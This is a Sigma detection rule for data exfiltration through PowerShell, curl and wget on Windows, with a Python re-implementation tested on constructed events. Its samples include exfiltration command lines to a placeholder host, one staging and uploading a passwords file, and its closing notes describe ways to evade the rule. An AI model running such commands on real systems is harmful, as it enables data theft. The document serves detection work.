Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities exfiltrating data via web requests

Sigma rule

title: Potential Data Exfiltration Activity Via CommandLine Tools
id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
status: test
description: Detects the use of various CLI utilities exfiltrating data via web requests
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-02
modified: 2025-07-18
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_iwr:
        Image|endswith:
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'curl '
            - 'Invoke-RestMethod'
            - 'Invoke-WebRequest'
            - 'irm '
            - 'iwr '
            - 'wget '
        CommandLine|contains|all:
            - ' -ur' # Shortest unambiguous abbreviation of the -Uri parameter
            - ' -me' # Shortest unambiguous abbreviation of the -Method parameter
            - ' -b'
            - ' POST '
    selection_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: '--ur' # Shortest unambiguous abbreviation of curl's --url option
    selection_curl_data:
        CommandLine|contains:
            - ' -d ' # Short form of the --data option
            - ' --data '
    selection_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains:
            - '--post-data'
            - '--post-file'
    payloads:
        - CommandLine|contains:
              - 'Get-Content'
              - 'GetBytes'
              - 'hostname'
              - 'ifconfig'
              - 'ipconfig'
              - 'net view'
              - 'netstat'
              - 'nltest'
              - 'qprocess'
              - 'sc query'
              - 'systeminfo'
              - 'tasklist'
              - 'ToBase64String'
              - 'whoami'
        - CommandLine|contains|all:
              - 'type '
              - ' > '
              - ' C:\'
    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
falsepositives:
    - Unlikely
level: high
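The rule's matching logic applied to a handful of constructed process_creation events, as an added example that is not part of the SigmaHQ rule or of this page. It re-implements the Sigma `contains`, `contains|all` and `endswith` modifiers (case-insensitive substring and suffix tests) in plain Python and evaluates the `condition` exactly as written above. Event field names follow the Sigma process_creation schema; every host, path, file name and command line is made up for illustration.

```python
# Added example: the Sigma rule above re-implemented in plain Python and run
# over constructed process_creation events (not real telemetry). Sigma's
# 'contains' and 'endswith' modifiers are case-insensitive, so all comparisons
# are done on lower-cased values.

IWR_IMAGES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe", "\\cmd.exe")
IWR_TOOLS = ("curl ", "Invoke-RestMethod", "Invoke-WebRequest", "irm ", "iwr ", "wget ")
IWR_FLAGS_ALL = (" -ur", " -me", " -b", " POST ")   # abbreviated -Uri / -Method / -Body
CURL_URL = ("--ur",)                                 # abbreviated curl --url
CURL_DATA = (" -d ", " --data ")
WGET_POST = ("--post-data", "--post-file")
PAYLOAD_ANY = ("Get-Content", "GetBytes", "hostname", "ifconfig", "ipconfig",
               "net view", "netstat", "nltest", "qprocess", "sc query",
               "systeminfo", "tasklist", "ToBase64String", "whoami")
PAYLOAD_TYPE_ALL = ("type ", " > ", " C:\\")


def contains(value, needles):
    """Sigma 'contains' with a list: OR across needles, case-insensitive."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def contains_all(value, needles):
    """Sigma 'contains|all': AND across needles, case-insensitive."""
    v = value.lower()
    return all(n.lower() in v for n in needles)


def endswith(value, suffixes):
    """Sigma 'endswith' with a list: OR across suffixes, case-insensitive."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def selection_iwr(ev):
    cl = ev["CommandLine"]
    return (endswith(ev["Image"], IWR_IMAGES) and contains(cl, IWR_TOOLS)
            and contains_all(cl, IWR_FLAGS_ALL))


def selection_curl(ev):
    return endswith(ev["Image"], ("\\curl.exe",)) and contains(ev["CommandLine"], CURL_URL)


def selection_curl_data(ev):
    return contains(ev["CommandLine"], CURL_DATA)


def selection_wget(ev):
    return endswith(ev["Image"], ("\\wget.exe",)) and contains(ev["CommandLine"], WGET_POST)


def payloads(ev):
    cl = ev["CommandLine"]
    return contains(cl, PAYLOAD_ANY) or contains_all(cl, PAYLOAD_TYPE_ALL)


def matches(ev):
    """condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads"""
    return ((selection_iwr(ev) or (selection_curl(ev) and selection_curl_data(ev))
             or selection_wget(ev)) and payloads(ev))


# Constructed events; hosts, paths and file names are placeholders.
SAMPLE_EVENTS = {
    # PowerShell POSTs a file read with Get-Content: selection_iwr + payloads -> hit
    "ps_post_file": {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -nop -c Invoke-WebRequest -Uri https://example.invalid/up -Method POST -Body (Get-Content C:\Users\bob\notes.txt)"},
    # Aliased cmdlet, abbreviated parameters, lower-case 'post': still a hit
    "pwsh_alias_lowercase": {
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "CommandLine": "pwsh.exe -c iwr -ur https://example.invalid/up -me post -b (whoami)"},
    # curl.exe with --url and -d; 'systeminfo' in the file name satisfies payloads
    "curl_post_systeminfo": {
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl.exe --url https://example.invalid/api -d @C:\Temp\systeminfo.txt"},
    # wget.exe --post-file with 'tasklist' in the path -> hit
    "wget_post_file": {
        "Image": r"C:\Tools\wget.exe",
        "CommandLine": r"wget.exe --post-file=C:\Temp\tasklist.txt https://example.invalid/collect"},
    # cmd.exe stages a file with 'type ... > C:\...' and then calls curl: the cmd.exe
    # event carries the payload but fails selection_iwr (' --url' does not contain
    # ' -ur') and its Image is not curl.exe -> miss
    "cmd_type_then_curl": {
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c type C:\Users\bob\passwords.txt > C:\Temp\out.txt && curl --url https://example.invalid/up -d @C:\Temp\out.txt"},
    # ...and the child curl.exe event has no payload indicator at all -> miss
    "curl_child_of_cmd": {
        "Image": r"C:\Windows\System32\curl.exe",
        "CommandLine": r"curl --url https://example.invalid/up -d @C:\Temp\out.txt"},
    # Plain download: no -Method / -Body / POST -> miss
    "ps_benign_download": {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -c Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile C:\Temp\tool.zip"},
}


def evaluate(events=SAMPLE_EVENTS):
    """Return {event_name: True/False} for each event under the rule's condition."""
    return {name: matches(ev) for name, ev in events.items()}


if __name__ == "__main__":
    for name, hit in evaluate().items():
        print(f"{'HIT ' if hit else 'miss'} {name}")
```

Two things the sample set makes visible. Matching is per process-creation event, so a file staged with `type ... > C:\...` in cmd.exe and sent by a separate curl.exe child never has both halves in one command line and slips past the rule; correlating parent and child, or matching on the staged path, would close that gap. Also, `' --data '` with its trailing space does not cover `--data-binary`, `--data-raw` or `--data-urlencode`, and curl `-F`/`--form`, `-T`/`--upload-file` and PowerShell `-InFile` uploads are outside the rule's scope altogether, so treat the `high` level as applying only to the exact patterns listed.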
